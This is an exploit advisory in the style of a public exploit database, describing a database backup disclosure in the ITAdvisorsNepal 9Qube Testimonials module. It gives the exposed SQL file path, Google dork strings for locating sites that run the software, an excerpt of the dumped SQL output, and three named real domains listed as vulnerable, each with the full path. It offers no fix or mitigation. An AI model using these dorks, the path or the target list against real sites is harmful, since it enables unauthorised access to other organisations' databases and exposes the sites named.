#################################################################################################

# Exploit Title : ITAdvisorsNepal 9Qube Testimonials Modules 1.0 Database
Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 17/12/2018
# Vendor Homepage : itadvisorsnepal.com ~ 9qube.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & developed by IT Advisors Nepal''
+ intext:''Powered by IT Advisors Nepal''
+ intext:''Crafted by 9Qube''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Exploit :

/application/modules/testimonials/testimonials.sql

#################################################################################################

**********************************************

# Example SQL Dump Informations =>

-- phpMyAdmin SQL Dump
-- version 4.4.9
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.6.24-72.2
-- PHP Version: 5.6.99-hhvm

INSERT INTO `testimonials` (`id`, `title`, `organization`, `description`,
`image`, `url`, `status`,
`created_on`, `created_by`, `updated_on`, `updated_by`) VALUES

-- Database: `9qube.com`

-- Table structure for table `testimonials`

-- Dumping data for table `testimonials`

-- Indexes for table `testimonials`

-- AUTO_INCREMENT for table `testimonials`

**********************************************

#################################################################################################

# Example Vulnerable Sites =>

[+] exim-nepal.com/application/modules/testimonials/testimonials.sql

[+] britishamerican.edu.np/application/modules/testimonials/testimonials.sql

[+] omnetworks.com.np/application/modules/testimonials/testimonials.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################